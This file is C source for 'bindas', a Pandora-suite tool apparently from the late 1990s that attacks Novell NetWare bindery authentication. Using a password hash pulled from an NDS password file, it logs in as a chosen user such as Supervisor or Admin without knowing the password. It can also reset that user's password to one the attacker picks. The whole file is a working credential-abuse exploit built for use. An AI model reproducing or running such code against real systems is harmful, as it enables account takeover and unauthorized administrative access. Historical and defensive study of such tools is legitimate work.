/* Full Credit to Itsme, 90% of this is his code */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "..\pandora\pan_file.h"
#include "..\pandora\pan_hash.h"
#include "panrcp.h"

/*
 * Print some usage info....
 */
void printHelp(int j)
{
   printf("\nUSAGE: bindas <newpass> -l|c <account>\n");
   printf("  -h           prints this HELP file.\n");
   printf("EXAMPLE:\n");
   printf(" bindas -l Supervisor    Will log you as Supervisor\n");
   printf(" bindas hacked -c Admin  Will change Admin's password to 'hacked'\n\n");
   printf("  Take minimum password length in consideration when changing password\n");
   printf("  Note that sometimes change will work only if password is at least one\n");
   printf("  character longer than original -- go figure...\n");
   printf("\n");
   printf(" Additional note : unless you change the code, this works only for level 1 signature\n");
   exit(j);
}

int logas(Pan_PassHack *pPassHack,char *name)
{
 uint8 logkey[8];
 int err;

 err=Pan_NCP_connect(0);
 if (err) return (-1);

 err=getlogkey(logkey);
 if (err) return (-2);

 err=Pan_Challenge_Response(pPassHack,TRUE,logkey,logkey);
 if (err) return (-3);

 return(logincrypt(logkey,pPassHack->bind,name));
}

int min(int a, int b)
{return (a<b?a:b);}

int changepw(Pan_PassHack *pPassHack,char *name, char *newpw)
{
 Pan_PassHack pTemp;
 uint8 logkey[8],oldcrpw[16],newcrpw[16];
 long id;
 int err,l,i;

 if (getlogkey(logkey)==0)
  {
   /*** the trick ***/
   for(i=0;i<16;i++) oldcrpw[i]=pPassHack->hash[i];
   err=Pan_Challenge_Response(pPassHack,TRUE,logkey,logkey);
   if (err) return (-3);

   /*** generates new hash***/
   pTemp.objectID=pPassHack->objectID;
   pTemp.pwlen=strlen(newpw);
   for(i=0;i<pTemp.pwlen;i++) pTemp.pw_first[i]=(uint8)newpw[i];
   pTemp.pw_first[pTemp.pwlen]='\0';
   err=Pan_Hash_Gen(&pTemp);
   if (err) return (-4);
   for(i=0;i<16;i++) newcrpw[i]=pTemp.hash[i];

   /*** where the magic happens ***/
   Pan_3hash_cipher(oldcrpw,newcrpw,newcrpw);
   /* l is the lengh of the cleartext password transfered in a ciphered */
   /* fashion, but the server who knows the oldhash is able to retreive */
   /* the real lengh of the new password */
   l=((( min(63,strlen(newpw))^oldcrpw[0]^oldcrpw[1] )&0x7f)|0x40);

   return(setpwcrypt(logkey,pPassHack->bind,name,newcrpw,l));
  }
 else return(-2);
}

/*
 * Main prog...
 */

int main(int argc, char *argv[])
{
   int i,t,err,FOUND=FALSE,choice;
   char *account=(char *)calloc(1,sizeof(char)*MAX_CHARS);
   char *newpass=(char *)calloc(1,sizeof(char)*MAX_CHARS);
   Pan_PassList pPassList,q;
   Pan_PassHack pPassHack;

/* Say hello... */
   printf("\n\nBINDAS - Bindery Log as a user if we have his hash\n");
   printf("       - And change a user password too !!!\n");
   printf("       BINDERY TRICK I.E. ONLY IF USER IN SAME CONTAINER AS SERVER\n");
   printf("Comments/bugs: pandora@nmrc.org\n");
   printf("http://www.nmrc.org/pandora\n");
   printf("1997,1998 (c) Nomad Mobile Research Centre\n");

   if (argc<2) printHelp(1);

   /* process command line switches, if any... */
   for (i=1 ; i<argc ; i++)
   {
      if (argv[i][0]=='-')
	 switch(argv[i][1])
	 {
	    case 'h':
	    case 'H':
            case '?':
	       printHelp(0);
	    case 'l':
	    case 'L':
               if ((i+1>argc) || argv[i+1]==NULL)
	       {
		  printf("No argument given for option -u\n");
		  printHelp(-1);
	       }
               if (argv[i+1][0]=='-')
               {
                  printf("No argument given for option -u\n");
                  printHelp(-1);
               }
               sprintf(account,"%s",argv[i+1]);
               FOUND=TRUE; choice=1;
	       break;
	    case 'c':
	    case 'C':
               if ((i+1>argc) || argv[i+1]==NULL)
	       {
		  printf("No argument given for option -c\n");
		  printHelp(-1);
	       }
               if (argv[i+1][0]=='-')
               {
                  printf("No argument given for option -c\n");
                  printHelp(-1);
               }
               sprintf(account,"%s",argv[i+1]);
               FOUND=TRUE; choice=2;
	       break;
	    default:
	       printf("Invalid option: %s\n", argv[i]);
	       printHelp(-1);
	 }
   }

 sprintf(newpass, "%s", argv[1]);
 for (i=0;i<strlen(newpass);i++) newpass[i]=toupper(newpass[i]);
  /* convert lower case letters to upper case letters */

 if (!FOUND) {printf("No user name given\n");
              exit(-1);}

 err=Pan_PassList_read("PASSWORD.NDS",&pPassList);
 if (err) {printf("err : %d",err);
           exit(-1);}

 for (q=pPassList;q!=NULL;q=q->next)
  {FOUND=TRUE;
   for (i=0;i<strlen(account);i++)
    {t=i*2+6;
     if (account[i]!=q->userCN[t]) FOUND=FALSE;
    }
   if (FOUND==TRUE) break;
  }
 if (!q)
  {printf("%s not found in password file.\n",account);
   Pan_PassList_free(pPassList);
   exit(1);
  }
 if(!q->pwhash_known)
  {printf("We must have the password hash to do this");
   Pan_PassList_free(pPassList);
   exit(1);
  }

 Pan_PassList_to_PassHack(q,&pPassHack);
 Pan_PassList_free(pPassList);

 printUnicodeName(pPassHack.userCN,258); printf(" ");
 printUnicodeName(pPassHack.userOU,40);
 printf(" id-%08lx parentID-%08lx objectID-%08lx pwlen-%d\n\n real hash   - ",
 pPassHack.id,pPassHack.parentID,pPassHack.objectID,pPassHack.pwlen);
 for (i=0;i<16;i++) printf("%02x",pPassHack.hash[i]);

 if (choice==1)
  {err=logas(&pPassHack,account);
   if (err) {printf("\n\n err : %d \n",err);
           exit(-1);}
   else printf("\n\n You're In as %s \n",account);
  }

 if (choice==2)
  {err=changepw(&pPassHack,account,newpass);
   if (err) {printf("\n\n err : %d \n",err);
             exit(-1);}
   else printf("\n\n %s new password is %s \n",account,newpass);
  }
}
